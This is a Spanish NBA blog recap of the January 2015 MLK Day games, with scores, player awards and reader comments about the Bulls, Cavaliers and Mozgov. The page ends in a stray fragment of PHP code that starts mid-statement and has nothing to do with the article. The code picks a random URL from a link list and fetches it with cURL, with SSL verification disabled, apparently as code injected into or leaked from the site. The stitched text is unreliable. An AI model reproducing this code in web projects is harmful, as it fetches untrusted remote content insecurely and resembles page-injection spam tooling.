La crónica: Ensayo de Playoffs

20 de January de 2015 por MagicJohnson32

Adoramos el MLK Day. Para cualquier fan de la NBA, este día en honor a Martin Luther King es una segunda navidad, pero sin compromisos familiares ni galas de Raphael en la tele. La jornada de ayer, además, y pese a empezar con varios partidos sin ninguna historia por la poca competitividad que se vio, fue a más y finalmente ofreció algunos encuentros que podrían perfectamente repetirse en los próximos Playoffs. También fuimos testigos -¡aleluya!- de una victoria de los Knicks y otra actuación descomunal de James Harden.

Os los contamos a continuación.

memdal

Dallas Mavericks 103 – Memphis Grizzlies 95

El primer gran partido del MLK Day se vio en el FedEx Forum de Memphis, donde Mavs y Grizzlies protagonizaron 48 minutos con aroma, ritmo y tensión propios de los Playoffs, personificados por las batallas de Chandler, Randolph y Marc Gasol bajo los aros. Los locales hicieron la goma durante todo el encuentro ante unos excelentes Mavericks y llegaron a situarse por delante en el último periodo. Los de Carlisle, mejores en el global del partido con Monta Ellis como puntal, recurrieron a Dirk Nowitzki en los minutos decisivos y el alemán respondió sellando el triunfo con los últimos ocho puntos antes del bocinazo final.

Chicago Bulls 94 – Cleveland Cavaliers 108

Y así, casi de repente, el equipo que está en crisis son los Bulls y el que empieza a mirar hacia arriba son los Cavs. Los segundos demostraron su mejoría con buenas actuaciones de Mozgov y JR Smith, complementos ideales para un Big Three en el que LeBron llevó el peso anotador, Irving distribuyó juego y Love aportó rebote. Enfrente, unos Bulls de nuevo demasiado planos, incapaces de superar la frecuentemente débil defensa de los Cavaliers ni de frenar el talento ofensivo del quinteto de Blatt. Las malas sensaciones llevaron a que Derrick Rose cuestionase la implicación de los jugadores en sus declaraciones post partido y Thibodeau asegurase que el modo en que están jugando es “inaceptable”.

Toronto Raptors 92 – Milwaukee Bucks 89

De regreso de Londres, los Bucks no fueron capaces de sacar partido a las dudas que vienen afectando a los Raptors, unas dudas que no acaban de despejarse pese a la victoria cosechada anoche en Milwaukee. Casey salió con Vásquez de titular en lugar de Terrence Ross y la medida pareció funcionar: Ross anotó 16 puntos, entre ellos las dos últimas canastas de su equipo. Sin embargo, DeRozan se quedó a cero (0 de 9 en tiros, 0 puntos) y Lowry sigue sin recuperar el nivel de semanas atrás, y solo los errores de los Bucks permitieron a los canadienses llevarse el triunfo del Bradley Center.

Resto de la jornada

¡Ganaron los Knicks! A costa de unos Pelicans sin Anthony Davis ni Holiday, y sufriendo al final tras ir ganando cómodamente todo el partido, pero los inquilinos de Madison Square Garden pusieron fin a la racha de 16 derrotas seguidas (92-99). Los equipos con más partidos perdidos de manera consecutiva en estos momentos son Lakers y Pacers, ambos con 5 tras caer anoche en Phoenix y Houston respectivamente. Los Suns no tuvieron problema para batir a unos Lakers sin Kobe (100-115), mientras Harden siguió cimentando su candidatura a MVP, esta vez a costa de los Pacers (98-110). También siguen a lo suyo los dos líderes de conferencia, que ampliaron sus respectivas e impresionantes rachas. Los Warriors se dieron un festín con los Nuggets (79-122), devorados desde el mismo salto inicial por Curry, Thompson & Co, que mediado el segundo cuarto ya habían sentenciado el partido. Más tuvieron que sudar los Hawks frente a los Pistons, a quienes no les valió con su dominio en el rebote (+19) ante el método Budenholzer (31 asistencias en 37 canastas). El triunfo de Atlanta (82-93) es el 13º consecutivo y el 27º en los últimos 29 partidos disputados. El segundo del Oeste, los Blazers, vencieron a los Kings pero perdieron a LaMarcus por lesión (94-98). En el Staples, la buena actuación del banquillo de los Celtics evitó una victoria aún más cómoda de los Clippers (93-102). Los angelinos se bastaron con la monstruosa actuación de su pareja interior. El sorprendente retorno de Al Jefferson fue lo más destacado en la abultada victoria de los Hornets sobre los Wolves (80-105). Más clara todavía fue la paliza de los Wizards a los Sixers (76-111), con el papel de Noel como lo único positivo para los de Philadelphia.

PREMIOS

MVP: Una vez más, James Harden, autor de 45 puntos con 12 de 18 en tiros de campo y 14 de 15 en libres, además de 7 asistencias y 4 robos de balón.

Rookie: El mejor de los Celtics anoche fue Marcus Smart. El novato logró 14 puntos, con 4 de 7 en triples, además de 7 asistencias, 2 rebotes, 1 robo y 1 tapón.

Sorpresa: Lo hace de tanto en tanto. Mike Scott fue uno de los mejores de los Hawks anoche. 9 de 15 en tiros para 20 puntos, además de 5 rebotes y 2 robos.

Decepción: La humillación que sufrieron los Nuggets en Oakland quedó reflejada en el marcador y personificada en Arron Afflalo, desastroso en los 24 minutos que disputó y durante los cuales sólo fue capaz de sumar 1 rebote, 1 robo, 1 pérdida y 2 puntos con 1 de 8 en tiros de campo.

Mayor esfuerzo en vano: Seguimos viendo la versión renovada de Greg Monroe posterior a la marcha de Josh Smith incluso en las derrotas, como anoche en Atlanta. 16 puntos y 20 rebotes sumó el que será uno de los agentes libres más cotizados de este próximo verano.

TOP 10

 

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Nacho dice:
    #1

    Pues he visto muchos partidos de los Bulls en este enero en el que van en negativo. Ya lo dijo Pau cuando metió los 46 puntos: “no me gusta cuando un jugador mete tantos puntos” (más o menos) Su reflexión incidía en que era normal que el equipo buscase al jugador que está enchufado, pero que entiende el basket como un juego coral y que esas situaciones no suelen ser buenas para el equipo. Los resultados de este año le dan la razón. Alarmas en Chicago, pero están a tiempo.
    ¿Culpables? Probablemente todos. No creo que falte implicación de los jugadores, más bien adecuación. Y quien no parece adecuarse al equipo que tiene es Thibbo. No se puede ser perro de presa toda la vida, hay que adaptarse a lo que se tiene (maestro Pop) y más aún, disfrutarlo, como lo hace Greg.
    Tienen tiempo estos Bulls. por pinta y proyección deben ser el rival a batir en el Este, pero deben encontrarse, como lo han hecho los Hawks, como parecen estar los Cav’s (que no echen, empero, campanas al vuelo)
    También deben reencontrarse los Raptors. Junto a los Wizards y a los citados deben luchar por no ser 4º y 5º para tener plácidas primeras eliminatorias (por mucho que lleguen los asombrosos New Pistons)

      Citar

  2. Azabel dice:
    #2

    soy al único que le parece que los Cavs funcionan y funcionaran mejor con Mozgov que con Varejao?

    en primer lugar el brasilero me parece algo sobrestimado, es cierto que hace dos años se marco una temporada de 15 puntos y 15 rebotes o algo similar, pero lo cierto es que nunca ha sido un centro titular en la liga, ni siquiera en los Cavs de lebron, y fue parte de la era negra post lebron sin poder aportar demasiado
    dicho esto, venia a Vareajo tomando demasiado protagonismo, teniendo demasiados toque y forzando jugadas, asi también era uno de los que mas ‘puntos anotaba en el equipo, pero le hacia perder fluidez

    Mozgov por su parte no solo me parece mejor jugador, sino que es mas correcto para jugar, vuela completamente bajo radar, casi no fuerza jugadas y anota solo si la ocasión se le presenta, pero no la busca botando el balon como si hacia Varejao

    ahora, no se cuento le falta a Shumpert, pero los Cavs desde el regreso estelar de lebron, y sus nuevos compañeros Smith y Mozgov, en el peor momento de su campaña se han comido a Clippers y Bulls, dos equipos serios realmente, y ahora tienen 9 de los próximos 12 juegos de local para tratar de meterse entre los 3 primeros de la clasificación.

    dije en la previa que no me gustaba el perímetro de los Cavs formado por Irving-Dellevadova y Waiters-Joe Harris, la cosa tiene otra pinta con Shumpert y Smith de escoltas, y según se dice están en búsqueda de otro base

    cuidado que se vienen los Cavs!

      Citar

  3. Vader dice:
    #3

    Mozgov es un gran fichaje. Intimida con su estatura y es correcto en ataque, no se vuelve loco. A parte de un base suplente quizas los Cavs podrian ir a por Pumplee (el de Phoneix) que esta en venta…

      Citar

  4. Azabel dice:
    #4

    Vader:
    Mozgov es un gran fichaje. Intimida con su estatura y es correcto en ataque, no se vuelve loco. A parte de un base suplente quizas los Cavs podrian ir a por Pumplee (el de Phoneix) que esta en venta…

    ja y ofrecer que? yo con los ojos cerrados les doy a Thompson, no solo por que no progresa como debiera en su tercer año en la liga, sino tambien por que se dice que pretende 13 millones anuales.. wow

    los cavs tendran comprometidos para el proximo curso, tednran 60 millones comprometidos en love, irving y lebron, mas 10 de barejao y 6 de smith, ni aun mereciendoselo los Cavs pueden pagarle ese dinero a Thomspon, un trad epor un muy buien centro como Pumlee, quien es joven y jugador de rol seria la hostia

      Citar

  5. Lucho dice:
    #5

    Ya que hablaron de Mozgov. Es mejor que Koufos? En Nuggets creo que jugaba el griego de titular. En que sobresale uno del otro?

      Citar

  6. txusma dice:
    #6

    A Love hay q renovarlo, no?
    Es increible q los Cavs hayan ofrecido 12 kilos a Thompson y más increible es q él los haya rechazado. Veremos en qué acaba la negociación.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>